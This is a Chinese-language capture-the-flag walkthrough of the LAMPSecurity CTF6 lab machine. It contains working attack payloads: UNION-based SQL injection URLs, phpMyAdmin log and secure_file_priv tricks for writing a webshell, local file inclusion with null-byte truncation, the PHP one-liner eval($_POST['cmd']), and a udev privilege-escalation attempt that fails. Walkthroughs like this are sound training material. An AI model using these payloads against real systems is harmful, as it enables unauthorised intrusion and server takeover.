镜像下载地址: https://www./entry/lampsecurity-ctf6,85/
主机扫描: ╰─ nmap -p- -sV -oA scan 10.10.202.130 目录扫描
phpinfo 获取物理路径:/var/www/html 网站备份寻找敏感信息
phpmyadmin 登录试试 phpadmin 写shell 这里简单下复习下PHPadmin 拿shell的几种思路: 1)志文件写入一句话来获取webshell show global variables like "%log%" set global general_log = "ON";
show global variables like '%secure%';显示是NULL值,这样的情况下我们插入一句话是无法插入的,需要我们修改secure_file_priv=''为空值才能插入一句话: 解释一下: secure_file_priv为null 表示不允许导入导出; secure_file_priv指定文件夹时,表示mysql的导入导出只能发生在指定的文件夹; secure_file_priv没有设置时,则表示没有任何限制
这里日志文件没有开启,第一种方式无失效,第二种方式,标识没有限制,可以尝试写webshell
报错,目录没权限,尝试/tmp 目录写入没有问题的,放弃。尝试其他办法 主页面发现SQL注入漏洞: http://10.10.202.130/index.php?id=4 and true #true http://10.10.202.130/index.php?id=4 and false # false http://10.10.202.130/index.php?id=4 order by 7 #true http://10.10.202.130/index.php?id=4 order by 8 #false 10.10.202.130/index.php?id=4 union select 1,2,3,4,5,6,7 from user
http://10.10.202.130/?id=4 +UNION+ALL+SELECT+1,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),3,4,5,6,7 SQLmap 获取admin的密码 admin | 25e4ee4e9229397b6b17776bfceaf8e7 (adminpass) http://10.10.202.130/index.php?action=login 登录没发现长传点之类的接口 继续看看源代码 login.php 发现文件包含漏洞
这里后缀为.tpl,这里尝试使用截断%00或者%0A http://10.10.202.130/actions/login.php?action=../../conf/config.ini%00
尝试把一句话木马,这里有两个思路: 1. 通过phpamdin 写到tmp目录,进行文件包含../../../../../../tmp/hack.php%00
2. 写到日志文件,进行包含进来../../logs/log.log%00 看看能否解析 <?php eval($_POST['cmd']);?>
http://10.10.202.130/actions/login.php?action=../../logs/log.log%00
提权操作 尝试内核提权,几个都不行 最后通过Google得知内核Kernel version is 2.6.18-92.el5 需要UDEV提权 cp /usr/share/exploitdb/exploits/linux/local/8478.sh ./
sed -i -e 's/\r$//' 8478.sh
无法成功,尝试了多次,依旧,有可能跟环境有关系吧!
|
|